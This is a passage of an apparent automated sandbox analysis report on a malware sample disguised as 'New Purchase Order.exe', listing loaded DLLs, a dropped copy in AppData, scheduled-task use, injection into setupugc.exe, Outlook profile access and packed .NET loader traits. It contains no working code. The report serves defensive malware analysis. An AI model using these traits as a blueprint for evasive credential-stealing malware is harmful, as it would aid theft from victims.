            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: New Purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: New Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: setupugc.pdb source: New Purchase Order.exe, 00000009.00000002.2391524148.0000000001348000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000003.2330358622.000000000084B000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000002.3377112326.0000000000867000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SguBfrlSDIFxPr.exe, 00000010.00000000.2305918162.000000000093E000.00000002.00000001.01000000.0000000D.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000000.2457069327.000000000093E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2391133969.000000000329A000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2393257406.0000000003486000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000011.00000002.3378895822.0000000003630000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2391133969.000000000329A000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2393257406.0000000003486000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.3378895822.00000000037CE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: New Purchase Order.exe, 00000009.00000002.2391524148.0000000001348000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000003.2330358622.000000000084B000.00000004.00000020.00020000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000010.00000002.3377112326.0000000000867000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: New Purchase Order.exe, Form1.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: hbaiQWstL.exe.0.dr, Form1.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, GEBEIyvaTmTUmgbr2k.cs .Net Code: U7TZtQ1K3i System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New Purchase Order.exe.4136c80.3.raw.unpack, GEBEIyvaTmTUmgbr2k.cs .Net Code: U7TZtQ1K3i System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New Purchase Order.exe.7390000.5.raw.unpack, GEBEIyvaTmTUmgbr2k.cs .Net Code: U7TZtQ1K3i System.Reflection.Assembly.Load(byte[])
            Source: 17.2.setupugc.exe.3c5cd14.2.raw.unpack, Form1.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 9_2_0041A857 push DD2CA9E8h; retf 9_2_0041A85D
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 9_2_0040D20D push esp; ret 9_2_0040D258
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 9_2_004032C0 push eax; ret 9_2_004032C2
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 9_2_0040ABA3 push esi; ret 9_2_0040ABA4
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 9_2_00408433 push eax; iretd 9_2_00408434
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 9_2_00417D95 push ds; ret 9_2_00417D97
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 9_2_00418EE1 pushfd ; ret 9_2_00418F06
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 9_2_0041A68C push 00000063h; retf 9_2_0041A68E
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 9_2_017A225F pushad ; ret 9_2_017A27F9
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 9_2_017A27FA pushad ; ret 9_2_017A27F9
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 9_2_017D09AD push ecx; mov dword ptr [esp], ecx 9_2_017D09B6
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 9_2_017A283D push eax; iretd 9_2_017A2858
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 9_2_017A1328 push eax; iretd 9_2_017A1369
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe Code function: 14_2_017FC54D pushfd ; ret 14_2_017FC54E
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe Code function: 14_2_017FC9D7 push edi; ret 14_2_017FC9D9
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe Code function: 14_2_017B09AD push ecx; mov dword ptr [esp], ecx 14_2_017B09B6
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe Code function: 14_2_01781FEC push eax; iretd 14_2_01781FED
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe Code function: 14_2_01807E99 push ecx; ret 14_2_01807EAC
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe Code function: 14_2_0042DA0C push esi; retf 14_2_0042DA2F
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_036609AD push ecx; mov dword ptr [esp], ecx 17_2_036609B6
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_00D003F2 push ss; iretd 17_2_00D003F6
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_00D003BE push ebp; iretd 17_2_00D003CB
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_00CFC36D push edx; iretd 17_2_00CFC36E
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_00CF24EA push ebx; retf 17_2_00CF24EB
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_00D00400 push ds; retf 17_2_00D00403
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_00CF4AD2 push ds; ret 17_2_00CF4AD4
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_00CE5170 push eax; iretd 17_2_00CE5171
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_00CF73C9 push 00000063h; retf 17_2_00CF73CB
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_00CF7594 push DD2CA9E8h; retf 17_2_00CF759A
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_00CE78E0 push esi; ret 17_2_00CE78E1
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_00CFD8B8 push edi; iretd 17_2_00CFD8BA
            Source: New Purchase Order.exe Static PE information: section name: .text entropy: 7.866114778015551
            Source: hbaiQWstL.exe.0.dr Static PE information: section name: .text entropy: 7.866114778015551
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, HHhsU2qAYMPla5aIDYc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'llt51hi7Uh', 'cfn5cfR1la', 'GlC5iEKptJ', 'sm75gcn204', 'EX45jnrW9M', 'DYV5hdrV8X', 'ue15NmnIuU'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, q3VKdmLQewPeuA4N72.cs High entropy of concatenated method names: 'BlhyuwvyCG', 'f2cyb5Or5I', 'exMyxORGf4', 'r93xKhCEuE', 'AaRxzvm57M', 'KqSyB5nqrO', 'zSDyHH7rsW', 'uXAySAleYL', 'sBDylhWyiD', 'npFyZnag9a'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, ckj7u2pGAaf8INieFh.cs High entropy of concatenated method names: 'ToString', 'pG12CSogD5', 'fRQ2YYibja', 'cqD2P8Xjwt', 'NYw28ARQ1H', 'eCg2DN2xSO', 'S3t2WPC7FV', 'o6H2fUBcdx', 'gty2mwnJw6', 'pk52aw17Yw'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, JwTBk9IPoaxFjSc6xW.cs High entropy of concatenated method names: 'njHFXTdkTy', 'bHwFKs9fog', 'pM19BMhZlO', 'uDd9H83uAB', 'sPXFCisVtQ', 'OBDF05X4Qs', 'ug0FGoT7CR', 'Ug8F10XpR1', 'vxIFcyJ2nG', 'XI4FiOtSW5'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, SRCqlIJcgwJZFuosxj.cs High entropy of concatenated method names: 'rXnA1ZSnT0', 'ew1AcnT15A', 'UA0Aineepp', 'hkYAgNblnJ', 'QjqAjVUf9p', 'nCMAh0uNie', 'PeiANDHkU0', 'x6oAXoCWE2', 'EYfAoWCWBf', 'm78AKmSAvf'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, VgQkbRn23bHy4GHxvj.cs High entropy of concatenated method names: 'zpC9VigNRR', 'rhZ9Y8s21e', 'Eac9PGfupB', 'E0M98fXjtI', 'QjO91P1KlX', 'gRL9DhkLVH', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, OEhUlQ281Owx1tmo6p.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GDiSoLKqMH', 'NwrSKiXwEb', 'bGbSzjRWxr', 'LbmlBCdvcq', 'OsIlHnB7Bq', 'wc2lS6UUF0', 'iIEllN3WUm', 'TI4j1E5SxoaBtGlhdK9'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, OYyLu3T6BDUCTl9P9j.cs High entropy of concatenated method names: 'Y2ZxdbtF4S', 'oHuxArGRru', 'ErOx3VOA1F', 'RXexyoUXCc', 'T51xemAnsQ', 'XBd3jJajDm', 'WCD3hL4xqR', 'lGR3NIZXB9', 'z9b3Xd2tEK', 'S3p3ohUWrF'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, SWK57FcddZRYqoRlo9.cs High entropy of concatenated method names: 'WFjHybod5O', 'pcFHehYSh1', 'j9DHr9E8mZ', 'dnVHvU7uTd', 'DgCHsANLTn', 'XprH2161vt', 'YZXB000wkSdoPGWKM9', 'sxdcmdvKlOHQmKWnAf', 'DB0HH9aQyD', 'SEiHl2Wtf1'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, IWOHEthbFFReLStnZY.cs High entropy of concatenated method names: 'xnrqQoFdko', 'gERqINL86p', 'Q17qVpZKfu', 'bnqqYCUVdb', 'EiVq8wVfCF', 'PuLqDcdXxO', 'kn9qf2Ygce', 'fC5qmwktja', 'YOAqUnZq7p', 'n9aqCv4fLT'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, x9Oa4nuLVFFG6CaiRN.cs High entropy of concatenated method names: 'eHDyMGxpuj', 'BbbyTIi441', 'qn6ytSbdB6', 'byKyRf9rTI', 'pyLy6dQE8n', 'UgYynMQlrt', 'TBky7gL9oo', 'BBbyQpmX52', 'LXNyI1yFdn', 'I5myEHwcY2'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, nLS36HZfw7qLEHMs2t.cs High entropy of concatenated method names: 'DBGbRx37Fm', 'oW6bnImPae', 'zy2bQxfJuo', 'HJ5bITfOCD', 'CcXbsTrM4H', 'e0Mb2YIw9r', 'kYrbFKvLFZ', 'qQjb9sOh0W', 'jhGbJst8r8', 'z4nb5Hci8n'
            Source: 0.2.New Purchase Order.exe.40aee60.2.raw.unpack, DwiqYnyOeNkuOV9dDN.cs High entropy of concatenated method names: 'Yf7sU4IW69', 'YxZs0Suw1U', 'TVYs1uggY3', 'tWOschC8ni', 'LQusYTsIyX', 'YYpsPxkAh2', 'WSZs80nJcH', 'AXOsD4BuN9', 'Jo4sWUheHd', 'Sv1sfQKFWK'
